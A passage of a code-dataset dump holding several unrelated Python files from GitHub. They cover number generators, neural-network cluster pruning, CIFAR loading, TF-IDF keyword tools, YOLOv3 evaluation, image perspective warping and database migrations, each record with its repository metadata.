genres=genres, company=company)\n\n path_to_file = PDF_DIRECTORY + safe_title(title) + '-download.pdf'\n pdfkit.from_string(html_file, path_to_file)\n\n return path_to_file\n","repo_name":"Tiinzzy/movie-lookup","sub_path":"backend-api/create_pdf.py","file_name":"create_pdf.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2400204585","text":"#print first 10 odd and even numbers using iterators and compress.\r\ndef check_even(n):\r\n for i in range(2,n+1):\r\n if i % 2 == 0:\r\n yield i\r\ndef check_odd(n):\r\n for i in range(1,n):\r\n if i % 2 != 0:\r\n yield i\r\n \r\neven_numbers = iter(check_even(10))\r\nodd_numbers = iter(check_odd(10))\r\nprint(\"List of first 10 even numbers\")\r\nfor i in even_numbers:\r\n print(i)\r\nprint(\"List of first 10 odd numbers\")\r\nfor i in odd_numbers:\r\n print(i)\r\n","repo_name":"Samrat-Das-02/Python","sub_path":"A3.py","file_name":"A3.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39087129271","text":"from neural_net import ObservableNet, sum_columns\nfrom sklearn.cluster import DBSCAN, KMeans, AgglomerativeClustering\nfrom multiprocessing import Process\nimport pandas as pd\nfrom os import getcwd, path\nfrom matplotlib import pyplot as plt\nfrom sklearn.decomposition import PCA\nimport logging\n\ndbscan_params_1 = [1 * 10 ** ((-1) * (i + 1)) for i in range(10)]\ndbscan_params_2 = [5 * 10 ** ((-1) * (i + 1)) for i in range(10)]\ndbscan_params_3 = [2.5 * 10 ** ((-1) * (i + 1)) for i in range(10)]\ndbscan_params_4 = [7.5 * 10 ** ((-1) * (i + 1)) for i in range(10)]\ndbscan_params = dbscan_params_1 + dbscan_params_2 + dbscan_params_3 + dbscan_params_4\ncolumns = ['removed_label', 'accuracy', 'summed_vectors', 'label', 'epsilon', 'layer', 'g_w']\ndir = getcwd() + '/results.csv'\npath_layer = getcwd() + '/grads.csv'\npath_layer2 = getcwd() + '/weights.csv'\n\n\ndef remove_clusters_evaluate(label, vectors, observable_net, layer):\n results = list()\n label_set = set(label)\n observable_net.save_status()\n for l in label_set:\n for i, vector in enumerate(vectors):\n if label[i] == l:\n observable_net.remove_neuron(layer + 1, i)\n eval = observable_net.test()\n results.append((l, eval))\n observable_net.reset()\n return results\n\ndef remove_specific(label, observable_net, layer, remove_label=0):\n for i, l in enumerate(label):\n if l == remove_label:\n observable_net.remove_neuron(layer + 1, i)\n\n\n\ndef create_ref_architecture():\n observable_net = ObservableNet(784)\n observable_net.add_layer(512, name='hidden', seed=5034)\n observable_net.add_layer(256, name='hidden2', seed=6456)\n observable_net.add_layer(128, name='hidden3', seed=7675)\n observable_net.add_layer(64, name='hidden4', seed=8345)\n observable_net.add_layer(10, name='output', activation='linear', seed=997)\n test_results = observable_net.train(36)\n\n return observable_net, test_results\n\n\ndef create_time_vectors():\n create_dataset()\n net, test_results = create_ref_architecture()\n time_vectors_gradients = [net.create_time_vectors('gradient', layer) for layer in range(5)]\n time_vectors_weights = [net.create_time_vectors('weight', layer) for layer in range(5)]\n\n save_layer(time_vectors_gradients, test_results)\n save_layer(time_vectors_weights, test_results, grads=False)\n\n return net, time_vectors_gradients, time_vectors_weights\n\n\ndef start_dbscan_evaluation():\n net, time_vectors_gradients, time_vectors_weights = create_time_vectors()\n for epsilon in dbscan_params_1:\n for i, layer in enumerate(time_vectors_gradients[:-1]):\n summed_vectors = sum_columns(layer)\n label = DBSCAN(eps=epsilon).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, i)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, epsilon, i, 'g')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, epsilon, i, 'g')\n\n for epsilon in dbscan_params_1:\n for i, layer in enumerate(time_vectors_weights[:-1]):\n summed_vectors = sum_columns(layer)\n label = DBSCAN(eps=epsilon).fit_predict(summed_vectors)\n if len(set(label)) == 1:\n save_results(label[0], 0, summed_vectors, label, epsilon, i, 'w')\n else:\n results = remove_clusters_evaluate(label, summed_vectors, net, i)\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, epsilon, i, 'w')\n\n\ndef start_kmeans_evaluation():\n net, time_vectors_gradients, time_vectors_weights = create_time_vectors()\n for i in range(70):\n i = i + 1\n for x, layer in enumerate(time_vectors_gradients[:-1]):\n summed_vectors = sum_columns(layer)\n label = KMeans(n_clusters=i, random_state=3125).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, x)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, i, x, 'g')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, i, x, 'g')\n\n for i in range(70):\n i = i + 1\n for x, layer in enumerate(time_vectors_weights[:-1]):\n summed_vectors = sum_columns(layer)\n label = KMeans(n_clusters=i, random_state=3125).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, x)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, i, x, 'w')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, i, x, 'w')\n\n\ndef start_hac_evaluation():\n net, time_vectors_gradients, time_vectors_weights = create_time_vectors()\n for i in range(70):\n i = i + 1\n for x, layer in enumerate(time_vectors_gradients[:-1]):\n summed_vectors = sum_columns(layer)\n label = AgglomerativeClustering(n_clusters=i).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, x)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, i, x, 'g')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, i, x, 'g')\n\n for i in range(70):\n i = i + 1\n for x, layer in enumerate(time_vectors_weights[:-1]):\n summed_vectors = sum_columns(layer)\n label = AgglomerativeClustering(n_clusters=i).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, x)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, i, x, 'w')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, i, x, 'w')\n\n\ndef do_hac(i, net, time_vectors_gradients):\n i = i + 1\n for x, layer in enumerate(time_vectors_gradients[:-1]):\n summed_vectors = sum_columns(layer)\n label = AgglomerativeClustering(n_clusters=i).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, x)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, i, x, 'g')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, i, x, 'g')\n\n\ndef do_kmeans(i, net, time_vectors_gradients):\n i = i + 1\n for x, layer in enumerate(time_vectors_gradients[:-1]):\n summed_vectors = sum_columns(layer)\n label = KMeans(n_clusters=i, random_state=3125).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, x)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, i, x, 'g')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, i, x, 'g')\n\n\ndef do_dbscan(epsilon, net, time_vectors_weights):\n for i, layer in enumerate(time_vectors_weights[:-1]):\n summed_vectors = sum_columns(layer)\n label = DBSCAN(eps=epsilon).fit_predict(summed_vectors)\n if len(set(label)) == 1:\n save_results(label[0], 0, summed_vectors, label, epsilon, i, 'w')\n else:\n results = remove_clusters_evaluate(label, summed_vectors, net, i)\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, epsilon, i, 'w')\n\n\ndef save_results(removed_label, accuracy, summed_vectors, label, epsilon, layer, g_w):\n new_data = pd.DataFrame([(removed_label, accuracy, summed_vectors, label, epsilon, layer, g_w)], columns=columns)\n with open(dir, 'a') as f:\n new_data.to_csv(f, header=False, index=False)\n\n\ndef save_layer(layers, test, grads=True):\n tuples = list()\n for layer in layers:\n tuples.append((layer, test))\n to_save = pd.DataFrame(tuples, columns=['layer', 'accuracy'])\n if grads:\n to_save.to_csv(path_layer)\n else:\n to_save.to_csv(path_layer2)\n\n\ndef create_dataset():\n dataset = pd.DataFrame(columns=columns)\n dataset.to_csv(dir, index=False)\n\n\ndef best_results(path):\n results = pd.read_csv(path)\n results = results.loc[results['g_w'] == 'g']\n best_acc = results.groupby('layer')['accuracy'].max()\n b_r = pd.DataFrame(columns=results.columns)\n for acc in best_acc:\n b_r = b_r.append(results.loc[acc == results.accuracy])\n b_r = b_r.groupby(['layer', 'g_w'])['epsilon'].min()\n print(b_r)\n\n\ndef reproduce_result(layer, param, net, time_vectors_gradients, time_vectors_weights,\n grad=1, clustering='dbscan', remove_label=0):\n if clustering == 'dbscan':\n if grad == 1:\n label = DBSCAN(param).fit_predict(sum_columns(time_vectors_gradients[layer]))\n else:\n label = DBSCAN(param).fit_predict(sum_columns(time_vectors_weights[layer]))\n elif clustering == 'kmeans':\n if grad == 1:\n label = KMeans(param).fit_predict(sum_columns(time_vectors_gradients[layer]))\n else:\n label = KMeans(param).fit_predict(sum_columns(time_vectors_weights[layer]))\n elif clustering == 'hac':\n if grad == 1:\n label = AgglomerativeClustering(param).fit_predict(sum_columns(time_vectors_gradients[layer]))\n else:\n label = AgglomerativeClustering(param).fit_predict(sum_columns(time_vectors_weights[layer]))\n else:\n raise ValueError('clustering param unknown')\n if grad == 1:\n remove_specific(label, net, layer, remove_label=remove_label)\n else:\n remove_specific(label, net, layer, remove_label=remove_label)\n\n\ndef merge_all():\n hac_all = pd.read_csv(getcwd() + '/Results/hac.csv')\n for i in [x for x in range(47) if x % 5 == 0]:\n if path.isfile(getcwd() + '/Results17.04/Hac_g' + str(i) + '.csv'):\n hac_all = hac_all.append(pd.read_csv(getcwd() + '/Results17.04/Hac_g' + str(i) + '.csv'))\n if path.isfile(getcwd() + '/Results17.04/Hac_w' + str(i) + '.csv'):\n hac_all = hac_all.append(pd.read_csv(getcwd() + '/Results17.04/Hac_w' + str(i) + '.csv'))\n kmeans_all = pd.read_csv(getcwd() + '/Results/KMeans.csv')\n for i in [x for x in range(47) if x % 5 == 0]:\n if path.isfile(getcwd() + '/Results17.04/KMeans_g' + str(i)):\n kmeans_all = kmeans_all.append(pd.read_csv(getcwd() + '/Results17.04/KMeans_g' + str(i) + '.csv'))\n if path.isfile(getcwd() + '/Results17.04/KMeans_w' + str(i) + '.csv'):\n kmeans_all = kmeans_all.append(pd.read_csv(getcwd() + '/Results17.04/KMeans_w' + str(i) + '.csv'))\n hac_all.to_csv(getcwd() + '/Results/Hac_all.csv')\n kmeans_all.to_csv(getcwd() + '/Results/KMeans_all.csv')\n\ndef plot_time_vectors(summed_vectors, clustered=False):\n\n label = DBSCAN(0.025).fit_predict(summed_vectors)\n summed_vectors = PCA().fit_transform(summed_vectors)\n cmap = []\n for l in label:\n if l == 0:\n cmap.append('r')\n else:\n cmap.append('k')\n plt.scatter(summed_vectors[:, 0], summed_vectors[:, 1], c=cmap)\n plt.show()\n\n\nif __name__ == \"__main__\":\n net, tg, tw = create_time_vectors()\n # for i in range(10):\n # i = i + 20\n # do_kmeans(i, net, time_vectors_gradients)\n # print('Done')\n # merge_all()\n\n # start_hac_evaluation()\n #best_results(getcwd() + '/Results/Hac_all.csv')\n #l = 1\n #reproduce_result(0, 0.025, net, tg, tw)\n #reproduce_result(1, 48, net, tg, tw, clustering='hac', remove_label=46)\n #reproduce_result(2, 46, net, tg, tw, clustering='hac', remove_label=22)\n reproduce_result(3, 22, net, tg, tw, clustering='hac', remove_label=18)\n\n print(net.test(testing=0))\n print(net.test(testing=1))\n\n #plot_time_vectors(sum_columns(tg[0]))\n #plot_time_vectors(sum_columns(tg[1]))\n #plot_time_vectors(sum_columns(tg[2]))\n #plot_time_vectors(sum_columns(tg[3]))\n\n# best_results(getcwd()+'/Results/Hac_all.csv')\n# best_results(getcwd()+'/Results/KMeans_all.csv')\n","repo_name":"MartinWehking/Visualizing-the-Learning-Process-of-Neural-Networks","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":12492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23950329803","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 25 12:27:17 2017\n\n@author: DA\n\"\"\"\n\nexec(open('../data_utils_py3.py').read())\n\nimport numpy as np\n\nfrom pathlib import Path\nimport os\n\nX_train, y_train, X_test, y_test = load_CIFAR10(str(Path(os.getcwd()).parents[1])+'/data/cifar-10-batches-py')\n\n# Subsample the data\nnum_training = 47000\nnum_validation = 2000\nnum_test = 1000\n\n# Generating validation set\nmask = range(num_training, num_training + num_validation)\nX_val = X_train[mask]\ny_val = y_train[mask]\n\n# Generating training set\nmask = range(num_training)\nX_train = X_train[mask]\ny_train = y_train[mask]\n\n# Generating test set\nmask = range(num_test)\nX_test = X_test[mask]\ny_test = y_test[mask]\n\n# Reshape the image data from 3D matrices into vectors\nX_train = np.reshape(X_train, (X_train.shape[0], -1))\nX_val = np.reshape(X_val, (X_val.shape[0], -1))\nX_test = np.reshape(X_test, (X_test.shape[0], -1))\n\n# Centering data\nmean_image = np.mean(X_train, axis = 0)\n\nX_train -= mean_image\nX_val -= mean_image\nX_test -= mean_image\n\n# Clean up\ndel mask, num_test, num_training, num_validation, mean_image\n","repo_name":"DataDan01/CS231n-Notes","sub_path":"Assignment 2/Clean Attempt/data_load.py","file_name":"data_load.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27899989559","text":"import numpy as np\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.preprocessing import Normalizer\r\n\r\nfrom .base import (\r\n counter_to_dataframe,\r\n duplication_remover,\r\n keyword_list,\r\n keyword_parser,\r\n word_counter,\r\n)\r\n\r\n\r\ndef keyword_dataframe(df):\r\n \"\"\"키워드 단어 빈도\"\"\"\r\n if isinstance(df, pd.DataFrame):\r\n lis = keyword_list(df)\r\n keywords = keyword_parser(lis)\r\n counter = word_counter(keywords)\r\n df = counter_to_dataframe(counter)\r\n return df\r\n else:\r\n raise TypeError(\"input type is to be have to DataFrame\")\r\n\r\n\r\ndef keyword_dataframe_no_duplicated(df):\r\n \"\"\"키워드 중복 제거 단어 빈도\"\"\"\r\n if isinstance(df, pd.DataFrame):\r\n lis = keyword_list(df)\r\n keywords = keyword_parser(lis)\r\n keywords_set = duplication_remover(keywords)\r\n counter = word_counter(keywords_set)\r\n df = counter_to_dataframe(counter)\r\n return df\r\n else:\r\n raise TypeError(\"input type is to be have to DataFrame\")\r\n\r\n\r\ndef tfidf(df, *press):\r\n \"\"\"키워드 상대 빈도\"\"\"\r\n if isinstance(df, pd.DataFrame):\r\n if isinstance(press, str):\r\n df = df[press]\r\n lis = keyword_list(df)\r\n\r\n tfidfv = TfidfVectorizer()\r\n tdm = tfidfv.fit_transform(lis)\r\n\r\n word_count = (\r\n pd.DataFrame(\r\n {\r\n \"단어\": tfidfv.get_feature_names_out(),\r\n \"빈도\": tdm.sum(axis=0).flat,\r\n },\r\n )\r\n .sort_values(\"빈도\", ascending=False)\r\n .reset_index(drop=True)\r\n )\r\n return word_count\r\n else:\r\n raise TypeError(\"input type is to be have to DataFrame\")\r\n\r\n\r\ndef tfidf_vector(df):\r\n \"\"\"tfidf vector\"\"\"\r\n if isinstance(df, pd.DataFrame):\r\n lis = keyword_list(df)\r\n pipeline = Pipeline(\r\n [\r\n (\"vect\", CountVectorizer()),\r\n (\"tfidf\", TfidfTransformer()),\r\n ],\r\n )\r\n vec = pipeline.fit_transform(lis).toarray()\r\n return vec\r\n else:\r\n raise TypeError(\"input type is to be have to DataFrame\")\r\n\r\n\r\ndef normalize_vector(vec):\r\n \"\"\"normalize vector\"\"\"\r\n if isinstance(vec, np.ndarray):\r\n vec_nor = Normalizer().fit_transform(vec)\r\n return vec_nor\r\n else:\r\n raise TypeError(\"input type is to be have to ndarray\")\r\n","repo_name":"sorrychoe/pyBigKinds","sub_path":"pyBigKinds/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17462216677","text":"from datetime import datetime\n\n\nclass Case:\n\n def __init__(self, info, case_number, citation_number, date_location, type_status, charges, case_detail_link):\n self.name, birth_year = info\n self.birth_year = int(birth_year)\n self.case_number = case_number\n self.citation_number = citation_number[0] if citation_number else \"\"\n date, self.location = date_location\n self.date = datetime.date(datetime.strptime(date, '%m/%d/%Y'))\n self.violation_type, self.current_status = type_status\n self.charges = charges\n self.case_detail_link = case_detail_link\n","repo_name":"htharker42/recordExpung","sub_path":"src/backend/expungeservice/crawler/models/case.py","file_name":"case.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11173529297","text":"import cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pickle\r\nimport os\r\n\r\ndirection_div = 12\r\n\r\ndef src_mat(camera_type):\r\n dic_param = {}\r\n if camera_type == 'front':\r\n path_perspect = os.path.dirname(os.path.abspath(__file__))\r\n with open(path_perspect + \"/test_c.pkl\", 'rb') as f:\r\n dic_param = pickle.load(f)\r\n if camera_type == 'back':\r\n path_perspect = os.path.dirname(os.path.abspath(__file__))\r\n with open(path_perspect + \"/test_c.pkl\", 'rb') as f:\r\n dic_param = pickle.load(f)\r\n if len(dic_param) != 0:\r\n return dic_param['pts_src']\r\n else:\r\n return None\r\n\r\ndef wrapping(image, pts_src, camera_type):\r\n (h, w) = (image.shape[0], image.shape[1])\r\n\r\n if camera_type == 'front':\r\n destination = np.float32(\r\n # [[round(w * 0.8), round(h * 0.0)], [round(w * 0.8), round(h * 0.0)],\r\n # [round(w * 0.2), h], [round(w * 0.2), h]]\r\n [[round(w * 0.3), round(h * 0.0)], [round(w * 0.7), round(h * 0.0)],\r\n [round(w * 0.7), h], [round(w * 0.3), h]]\r\n )\r\n if camera_type == 'back':\r\n destination = np.float32(\r\n # [[round(w * 0.8), round(h * 0.0)], [round(w * 0.8), round(h * 0.0)],\r\n # [round(w * 0.2), h], [round(w * 0.2), h]]\r\n [[round(w * 0.3), round(h * 0.0)], [round(w * 0.7), round(h * 0.0)],\r\n [round(w * 0.7), h], [round(w * 0.3), h]]\r\n )\r\n\r\n transform_matrix = cv2.getPerspectiveTransform(pts_src, destination)\r\n minv = cv2.getPerspectiveTransform(destination, pts_src)\r\n _image = cv2.warpPerspective(image, transform_matrix, (w,h))\r\n\r\n return _image, minv\r\n\r\ndef bird_convert(img, camera_type):\r\n srcmat = src_mat(camera_type)\r\n img_warpped, minverse = wrapping(img, srcmat, camera_type)\r\n\r\n return img_warpped","repo_name":"Gynjn/Contest","sub_path":"birdeye.py","file_name":"birdeye.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18504007785","text":"import pytorch_lightning as pl\nimport torch\nfrom .config import cfg\nfrom .tokenizer import CharLevelTokenizer\nimport pandas as pd\n\n\nclass WordDataset(torch.utils.data.Dataset):\n def __init__(self, tokenizer, csv_path, indices=None):\n super().__init__()\n self.raw = pd.read_csv(csv_path).dropna(axis=0)\n self.tokenizer = tokenizer\n # Use indices if given, else use whole csv\n self.indices = indices if not indices is None else list(range(len(self.raw)))\n\n def set_mode(self, mode):\n assert mode in [\"train\", \"val\"]\n self.mode = mode\n\n def __getitem__(self, idx):\n idx = self.indices[idx]\n word = self.raw.iloc[idx % len(self.raw), 0]\n description = self.raw.iloc[idx % len(self.raw), 1]\n if self.mode == \"val\":\n seed = idx # Use deterministic masking when validating\n else:\n seed = None\n tokens, mask_ids, label = self.tokenizer.encode(\n word, description, mode=self.mode, seed=seed\n )\n tokens = torch.LongTensor(tokens)\n label = torch.LongTensor(label)\n\n one_hot_mask_ids = torch.zeros_like(tokens)\n one_hot_mask_ids[mask_ids] = 1\n # if label.shape[0] != 400:\n # print(one_hot_mask_ids.shape, label.shape, self.mode)\n label = label.masked_fill(\n ~one_hot_mask_ids.bool(),\n self.tokenizer.tokens_to_ids[cfg.TOKENIZATION.pad_token],\n )\n return tokens, one_hot_mask_ids, label\n\n def __len__(self):\n if self.mode == \"val\":\n # when validating, use different masks of the same example to get a better estimate of performance\n return len(self.indices) * cfg.TRAIN.repeat_val_dataset\n return len(self.indices)\n\n\nclass WordDataModule(pl.LightningDataModule):\n def __init__(self, tokenizer, csv_path):\n super().__init__()\n tmp = pd.read_csv(csv_path).dropna(axis=0)\n all_idx = list(range(len(tmp)))\n\n from sklearn.model_selection import train_test_split\n\n train_idx, val_idx = train_test_split(all_idx, train_size=cfg.TRAIN.train_size)\n\n self.train = WordDataset(tokenizer, csv_path, indices=train_idx)\n self.train.set_mode(\"train\")\n self.val = WordDataset(tokenizer, csv_path, indices=val_idx)\n self.val.set_mode(\"val\")\n\n def train_dataloader(self):\n dl = torch.utils.data.DataLoader(\n self.train,\n batch_size=cfg.TRAIN.batch_size,\n shuffle=True,\n num_workers=cfg.TRAIN.num_workers,\n )\n return dl\n\n def val_dataloader(self):\n dl = torch.utils.data.DataLoader(\n self.val,\n batch_size=cfg.TRAIN.batch_size,\n shuffle=False,\n num_workers=cfg.TRAIN.num_workers,\n )\n return dl\n","repo_name":"ojus1/WordGuesser","sub_path":"core/WordDataModule.py","file_name":"WordDataModule.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1635440183","text":"# coding:utf-8\n\n# 常量\n\nIMAGE_CODE_REDIS_EXPIRES = 120 # 图片验证码在redis的保存时间\nSMS_CODE_REDIS_EXPIRES = 300 # 短信验证码在redis的保存时间\nQINIU_URL_DOMAIN = 'http://p7kohmjxl.bkt.clouddn.com/' # 七牛域名\\\nLOGIN_ERROR_MAX_NUM = 5\nLOGIN_ERROR_FORBID_TIME = 600\nAREA_INFO_REDIS_EXPIRES = 3600","repo_name":"Daiiyue/aijia","sub_path":"ihome/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9308406949","text":"# -*- encoding: utf-8 -*-\n\n__author__ = 'pp'\n__date__ = '6/26/14'\n\n\nimport unittest\nimport json\n\nfrom georest import geo\nfrom georest.model import OperationsModel, AttributesModel\nfrom georest.model.operations import NoSuchOperation, BadInvoke\n\n\nclass TestOperationsModel(unittest.TestCase):\n def setUp(self):\n self.model = OperationsModel()\n\n def test_no_op(self):\n geom = geo.Geometry.build_geometry('{\"type\":\"Point\",\"coordinates\":[30,10]}')\n with self.assertRaises(NoSuchOperation):\n self.model.invoke('kangaroo', geom)\n\n with self.assertRaises(BadInvoke):\n self.model.invoke('length')\n\n with self.assertRaises(BadInvoke):\n self.model.invoke('length', geom, geom)\n\n with self.assertRaises(BadInvoke):\n self.model.invoke('difference', geom)\n\n def test_pod_op(self):\n geom = geo.Geometry.build_geometry('{\"type\":\"LineString\",\"coordinates\":[[10.0,0.0],[10.0,10.0]]}')\n result = self.model.invoke('length', geom)\n self.assert_(result.is_pod)\n self.assertEqual(result.value, 10.0)\n\n def test_geom_op(self):\n geom = geo.Geometry.build_geometry('{\"type\":\"Point\",\"coordinates\":[30,10]}')\n result = self.model.invoke('centroid', geom)\n self.assertFalse(result.is_pod)\n self.assert_(geom.equals(result.value))\n\n\nclass TestAttributesModel(unittest.TestCase):\n def setUp(self):\n self.model = AttributesModel()\n\n def test_attributes(self):\n geom = geo.Geometry.build_geometry('{\"type\":\"LineString\",\"coordinates\":[[10.0,0.0],[10.0,10.0]]}')\n\n # unknown attributes are just ignored\n result = self.model.attributes(geom, includes=['ballistic'])\n self.assertEqual(json.loads(result), {'length': 10.0})\n","repo_name":"Kotaimen/georest","sub_path":"tests/model/test_operations.py","file_name":"test_operations.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11587783823","text":"import cv2\nimport os\nimport shutil\nimport numpy as np\nimport tensorflow as tf\nimport core.utils as utils\nfrom core.config import cfg\nfrom core.yolov3 import YOLOv3, decode\n\n\nINPUT_SIZE = 416\nNUM_CLASS = len(utils.read_class_names(cfg.YOLO.CLASSES))\nCLASSES = utils.read_class_names(cfg.YOLO.CLASSES)\n\npredicted_dir_path = '../mAP/predicted'\nground_truth_dir_path = '../mAP/ground-truth'\nif os.path.exists(predicted_dir_path): shutil.rmtree(predicted_dir_path)\nif os.path.exists(ground_truth_dir_path): shutil.rmtree(ground_truth_dir_path)\nif os.path.exists(cfg.TEST.DECTECTED_IMAGE_PATH): shutil.rmtree(cfg.TEST.DECTECTED_IMAGE_PATH)\n\nos.mkdir(predicted_dir_path)\nos.mkdir(ground_truth_dir_path)\nos.mkdir(cfg.TEST.DECTECTED_IMAGE_PATH)\n\n# Build Model\ninput_layer = tf.keras.layers.Input([INPUT_SIZE, INPUT_SIZE, 3])\nfeature_maps = YOLOv3(input_layer)\n\nbbox_tensors = []\nfor i, fm in enumerate(feature_maps):\n bbox_tensor = decode(fm, i)\n bbox_tensors.append(bbox_tensor)\n\nmodel = tf.keras.Model(input_layer, bbox_tensors)\nmodel.load_weights(\"./yolov3\")\n\nwith open(cfg.TEST.ANNOT_PATH, 'r') as annotation_file:\n for num, line in enumerate(annotation_file):\n annotation = line.strip().split()\n image_path = annotation[0]\n image_name = image_path.split('/')[-1]\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n bbox_data_gt = np.array([list(map(int, box.split(','))) for box in annotation[1:]])\n\n if len(bbox_data_gt) == 0:\n bboxes_gt=[]\n classes_gt=[]\n else:\n bboxes_gt, classes_gt = bbox_data_gt[:, :4], bbox_data_gt[:, 4]\n ground_truth_path = os.path.join(ground_truth_dir_path, str(num) + '.txt')\n\n print('=> ground truth of %s:' % image_name)\n num_bbox_gt = len(bboxes_gt)\n with open(ground_truth_path, 'w') as f:\n for i in range(num_bbox_gt):\n class_name = CLASSES[classes_gt[i]]\n xmin, ymin, xmax, ymax = list(map(str, bboxes_gt[i]))\n bbox_mess = ' '.join([class_name, xmin, ymin, xmax, ymax]) + '\\n'\n f.write(bbox_mess)\n print('\\t' + str(bbox_mess).strip())\n print('=> predict result of %s:' % image_name)\n predict_result_path = os.path.join(predicted_dir_path, str(num) + '.txt')\n # Predict Process\n image_size = image.shape[:2]\n image_data = utils.image_preporcess(np.copy(image), [INPUT_SIZE, INPUT_SIZE])\n image_data = image_data[np.newaxis, ...].astype(np.float32)\n\n pred_bbox = model.predict(image_data)\n pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]\n pred_bbox = tf.concat(pred_bbox, axis=0)\n bboxes = utils.postprocess_boxes(pred_bbox, image_size, INPUT_SIZE, cfg.TEST.SCORE_THRESHOLD)\n bboxes = utils.nms(bboxes, cfg.TEST.IOU_THRESHOLD, method='nms')\n\n\n if cfg.TEST.DECTECTED_IMAGE_PATH is not None:\n image = utils.draw_bbox(image, bboxes)\n cv2.imwrite(cfg.TEST.DECTECTED_IMAGE_PATH+image_name, image)\n\n with open(predict_result_path, 'w') as f:\n for bbox in bboxes:\n coor = np.array(bbox[:4], dtype=np.int32)\n score = bbox[4]\n class_ind = int(bbox[5])\n class_name = CLASSES[class_ind]\n score = '%.4f' % score\n xmin, ymin, xmax, ymax = list(map(str, coor))\n bbox_mess = ' '.join([class_name, score, xmin, ymin, xmax, ymax]) + '\\n'\n f.write(bbox_mess)\n print('\\t' + str(bbox_mess).strip())\n\n","repo_name":"YunYang1994/TensorFlow2.0-Examples","sub_path":"4-Object_Detection/YOLOV3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":1712,"dataset":"github-code","pt":"37"} +{"seq_id":"8869425846","text":"\"\"\"\nWrite a program that finds the summation of every number from 1 to num. The number will always be a positive integer greater than 0.\n\nFor example:\n\nsummation(8) -> 36\n1 + 2 + 3 + 4 + 5 + 6 + 7 + 8\n\n\"\"\"\ndef summation(num):\n # summation = sum(range(num + 1))\n # return summation\n summation = 0\n for i in range(num + 1):\n print(i)\n summation += i\n \n return summation\n\n\n\n\nif __name__ == \"__main__\":\n print(summation(8))\n\n\n\n","repo_name":"iicwerhelihleK/CodeWars","sub_path":"python/8kyu/summation.py","file_name":"summation.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22523220174","text":"import json\nimport sqlite3\nfrom collections.abc import Callable\nfrom datetime import datetime, timezone\nfrom functools import wraps\nfrom typing import Any\nfrom uuid import uuid4\n\nfrom passlib.context import CryptContext\n\nfrom cicada.api.settings import MigrationSettings\n\nmigration_queue = []\n\nMigration = Callable[[sqlite3.Connection], None]\n\n\ndef auto_migrate(version: int) -> Callable[[Migration], Migration]:\n def outer(migration: Migration) -> Migration:\n @wraps(migration)\n def inner(db: sqlite3.Connection) -> None:\n migration(db)\n db.commit()\n\n if get_version(db) == 0:\n db.executescript(\n \"\"\"\n CREATE TABLE _migration_version (version int NOT NULL);\n\n INSERT INTO _migration_version VALUES (1);\n \"\"\"\n )\n\n else:\n db.execute(\n \"UPDATE _migration_version SET version = (?);\",\n 